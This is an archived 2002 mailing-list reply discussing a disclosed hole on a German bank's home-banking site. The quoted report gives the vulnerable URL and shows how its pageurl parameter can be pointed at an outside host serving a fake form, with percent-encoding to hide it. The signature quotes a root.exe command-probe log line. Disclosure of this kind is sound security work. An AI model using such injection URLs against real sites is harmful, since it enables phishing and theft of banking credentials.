Re: security issue at hypovereins bank

From: Dominik Birk (dominik@code-foundation.de)
Date: Thu Apr 04 2002 - 14:51:05 PST


    At 12:12 05.04.02 +0200, hnz geeratz[room23] wrote:
    >hello
    
    good evening hnz
    
    >I found this security issue on the german hypovereins bank.
    
    I'm from Germany, and there was a hole like this in the hypovereinsbank site 
    a few months ago.
    
    >They were informed 3 months ago, still nothing has changed.
    >The security hole will allow an attacker to include his own forms in the
    >website. This will give him an option to collect sensitive information.
    >It is a home banking system!
    
    I think you could call this security hole CSS (cross-site scripting). At this 
    point I would like to refer to the paper by Obscure.
    
    http://eyeonsecurity.net/papers/Extended%20HTML%20Form%20Attack.htm
    
    The German version is at 
    http://www.code-foundation.de/archiv/form_attack.htm
    
    >take a look at this (long) URL:
    >http://www.hypovereinsbank.de/pub/templates/index.jsp?pageurl=%2Fpub%2Fio%2Fkarr%2F28100.jsp&id=18&mcontext=menu
    >
    >now it is possible to change the
    >pageurl=%2Fpub%2Fio%2Fkarr%2F28100.jsp&id=18&mcontext=menu
    >part to something like pageurl=http://www.evol.org/fake_form.php
    >
    >or try:
    >http://www.hypovereinsbank.de/pub/templates/index.jsp?pageurl=http://www.google.de
    >
    >so it is possible to include anything in this webpage.
    >The attacker could obscure the URL in a form like:
    >pageurl=h%74t%70%3A%2Fw%77w%77............
    >so the user will not notice that the included form is not from the original
    >server
    
    Yes, you are right. This is a really bad security hole, and in my opinion it 
    is negligent to leave this hole open. The Hypovereinsbank is a large bank in 
    Germany.
    
    >It opens the door to a new form of social hacking and data grabbing.
    
    ACK. I'm very astonished at the negligence of several system admins.
    
    >greetings hnz g
    
    Sincerely
    
    Dominik Birk
    
    
    --
    http://www.code-foundation.de
    217.229.69.207 - - [14/Oct/2001:02:29:41 +0200] "GET
    /MSADC/root.exe?/c+dir
    
    Microsoft? Where do you want to surf today?
    



    This archive was generated by hypermail 2b30 : Fri Apr 05 2002 - 14:58:39 PST